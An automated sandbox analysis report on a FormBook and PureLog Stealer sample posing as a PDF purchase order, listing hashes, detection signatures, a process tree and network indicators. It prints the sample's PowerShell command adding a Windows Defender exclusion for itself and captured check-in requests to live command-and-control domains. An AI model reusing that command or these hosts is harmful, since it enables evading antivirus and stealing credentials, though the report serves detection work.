Edit tour

Windows Analysis Report
PO-0005082025 pdf.exe

Overview

General Information

Sample name:	PO-0005082025 pdf.exe
Analysis ID:	1587583
MD5:	4185664f91aeccf6d3dca2609fe0659e
SHA1:	6cffdbc96d796affef71f83da5ae79e96c940f43
SHA256:	ce21bf206f998dad01775ae8fe4e487777cc8e9dc503c73f977b1fd41b9b312e
Tags:	exeuser-abuse_ch
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

PO-0005082025 pdf.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\PO-0005082025 pdf.exe" MD5: 4185664F91AECCF6D3DCA2609FE0659E)

powershell.exe (PID: 7484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0005082025 pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PO-0005082025 pdf.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\PO-0005082025 pdf.exe" MD5: 4185664F91AECCF6D3DCA2609FE0659E)

PO-0005082025 pdf.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\PO-0005082025 pdf.exe" MD5: 4185664F91AECCF6D3DCA2609FE0659E)

PO-0005082025 pdf.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\PO-0005082025 pdf.exe" MD5: 4185664F91AECCF6D3DCA2609FE0659E)

VuOkdnWJwVVuK.exe (PID: 1440 cmdline: "C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

cttune.exe (PID: 8048 cmdline: "C:\Windows\SysWOW64\cttune.exe" MD5: E515AF722F75E1A5708B532FAA483333)

VuOkdnWJwVVuK.exe (PID: 5764 cmdline: "C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 5796 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.2977853967.00000000009F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2978728918.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1764900052.0000000007890000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000002.2292265378.00000000018B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2978800956.0000000005010000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1752661123.0000000004239000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.2978571194.0000000002970000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2293444782.0000000001E40000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: PO-0005082025 pdf.exe PID: 7284	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.PO-0005082025 pdf.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.PO-0005082025 pdf.exe.7890000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO-0005082025 pdf.exe.7890000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.PO-0005082025 pdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.PO-0005082025 pdf.exe.4239970.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0005082025 pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0005082025 pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-0005082025 pdf.exe", ParentImage: C:\Users\user\Desktop\PO-0005082025 pdf.exe, ParentProcessId: 7284, ParentProcessName: PO-0005082025 pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0005082025 pdf.exe", ProcessId: 7484, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0005082025 pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0005082025 pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-0005082025 pdf.exe", ParentImage: C:\Users\user\Desktop\PO-0005082025 pdf.exe, ParentProcessId: 7284, ParentProcessName: PO-0005082025 pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0005082025 pdf.exe", ProcessId: 7484, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T15:12:17.574447+0100	2856318	1	A Network Trojan was detected	192.168.2.4	50009	194.9.94.85	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: PO-0005082025 pdf.exe	Virustotal: Detection: 39%			Perma Link
Source: PO-0005082025 pdf.exe	ReversingLabs: Detection: 68%

Yara detected FormBook

Source: Yara match	File source: 6.2.PO-0005082025 pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO-0005082025 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2977853967.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2978728918.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2292265378.00000000018B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2978800956.0000000005010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2978571194.0000000002970000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2293444782.0000000001E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: PO-0005082025 pdf.exe

Joe Sandbox ML: detected

Source: PO-0005082025 pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PO-0005082025 pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cttune.pdb source: PO-0005082025 pdf.exe, 00000006.00000002.2292077264.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000A.00000003.2270066946.0000000000EEB000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: cttune.pdbGCTL source: PO-0005082025 pdf.exe, 00000006.00000002.2292077264.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000A.00000003.2270066946.0000000000EEB000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VuOkdnWJwVVuK.exe, 0000000A.00000000.2206402486.0000000000D4E000.00000002.00000001.01000000.0000000C.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2978690059.0000000000D4E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO-0005082025 pdf.exe, 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2291880724.0000000004ECC000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2293700090.0000000005079000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO-0005082025 pdf.exe, PO-0005082025 pdf.exe, 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, cttune.exe, 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2291880724.0000000004ECC000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2293700090.0000000005079000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\cttune.exe

Code function: 11_2_0324C870 FindFirstFileW,FindNextFileW,FindClose,

11_2_0324C870

Source: C:\Windows\SysWOW64\cttune.exe	Code function: 4x nop then xor eax, eax		11_2_03239DF0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 4x nop then mov ebx, 00000004h		11_2_051004E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:50009 -> 194.9.94.85:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.tabyscooterrentals.xyz

Source: Joe Sandbox View	IP Address: 194.9.94.85 194.9.94.85
Source: Joe Sandbox View	IP Address: 85.159.66.93 85.159.66.93

Source: Joe Sandbox View

ASN Name: LOOPIASE LOOPIASE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /4wxo/?N4ahwR=AuCk/wTI7zW3ld/u5V6UHMq4RcE0g/F9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8nltxO6UIdlQF5gha+7lDPiUWIden6rAvAG6A=&SJ3=vToHyHVhRPNLk HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.tabyscooterrentals.xyzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Source: global traffic	HTTP traffic detected: GET /2j93/?N4ahwR=Vzef3oWXaGELtgURWqWViwZISDNuEbM3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt2Xz3j/2VHhm2H9/b4tezr7V2MsZ2w2FZo28=&SJ3=vToHyHVhRPNLk HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.milp.storeUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Source: global traffic	HTTP traffic detected: GET /1lpi/?SJ3=vToHyHVhRPNLk&N4ahwR=XO6lNaUCtrQGcU2USTz27ElFlDWrimrsd9ytkxpugSckEiM1CKodZj4VrjBa4PsrlwO68eKRpavYImQlE0qw/C9imwnZW7neNvgXOAig099dS9Lz8lx2NAM= HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.jyshe18.buzzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)

Source: global traffic	DNS traffic detected: DNS query: www.tabyscooterrentals.xyz
Source: global traffic	DNS traffic detected: DNS query: www.ftaane.net
Source: global traffic	DNS traffic detected: DNS query: www.milp.store
Source: global traffic	DNS traffic detected: DNS query: www.vavada-official.buzz
Source: global traffic	DNS traffic detected: DNS query: www.jyshe18.buzz

Source: unknown

HTTP traffic detected: POST /2j93/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 203Connection: closeHost: www.milp.storeOrigin: http://www.milp.storeReferer: http://www.milp.store/2j93/User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)Data Raw: 4e 34 61 68 77 52 3d 59 78 32 2f 30 66 79 67 66 46 46 65 67 54 64 74 63 62 71 2f 6d 55 78 65 4e 47 31 35 56 59 67 32 65 51 4f 39 2b 69 6b 43 50 56 55 6a 56 76 4e 68 34 71 2f 77 67 4d 54 74 36 77 32 73 72 49 71 55 6c 2f 69 63 4f 5a 56 59 4a 35 33 6b 70 64 51 50 55 2b 65 75 31 57 61 62 6d 4f 79 53 65 6a 69 4a 4a 59 2f 35 32 38 47 78 67 4e 52 69 51 4f 4e 32 38 52 31 54 38 57 71 66 31 56 33 65 2b 38 74 31 4b 4e 72 66 4b 43 47 52 30 51 35 43 45 4b 61 52 4a 67 75 43 31 68 36 78 46 59 44 45 54 31 4c 42 75 2b 58 54 30 53 30 5a 58 6d 4e 2b 77 6f 30 71 6c 32 2b 41 50 61 4a 38 72 37 64 6d 6e 34 32 37 69 41 3d 3d Data Ascii: N4ahwR=Yx2/0fygfFFegTdtcbq/mUxeNG15VYg2eQO9+ikCPVUjVvNh4q/wgMTt6w2srIqUl/icOZVYJ53kpdQPU+eu1WabmOySejiJJY/528GxgNRiQON28R1T8Wqf1V3e+8t1KNrfKCGR0Q5CEKaRJguC1h6xFYDET1LBu+XT0S0ZXmN+wo0ql2+APaJ8r7dmn427iA==

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 10 Jan 2025 14:11:50 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-10T14:11:55.3843528Z

Source: PO-0005082025 pdf.exe, 00000000.00000002.1750530175.0000000003231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: VuOkdnWJwVVuK.exe, 0000000C.00000002.2977853967.0000000000A7B000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jyshe18.buzz
Source: cttune.exe, 0000000B.00000002.2979842216.000000000627C000.00000004.10000000.00040000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.000000000341C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.jyshe18.buzz/
Source: VuOkdnWJwVVuK.exe, 0000000C.00000002.2977853967.0000000000A7B000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jyshe18.buzz/1lpi/
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: PO-0005082025 pdf.exe, 00000000.00000002.1757876600.0000000005CA4000.00000004.00000020.00020000.00000000.sdmp, PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cttune.exe, 0000000B.00000002.2977024809.00000000032CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: cttune.exe, 0000000B.00000003.2479009959.00000000032D7000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.2977024809.00000000032CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: cttune.exe, 0000000B.00000003.2479009959.00000000032E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: cttune.exe, 0000000B.00000003.2479009959.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.2977024809.00000000032CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: cttune.exe, 0000000B.00000003.2479009959.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.2977024809.00000000032CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: cttune.exe, 0000000B.00000003.2479009959.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.2977024809.00000000032CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: cttune.exe, 0000000B.00000002.2977024809.00000000032CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: cttune.exe, 0000000B.00000003.2479009959.00000000032D7000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.2977024809.00000000032CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: cttune.exe, 0000000B.00000003.2477815791.0000000008245000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
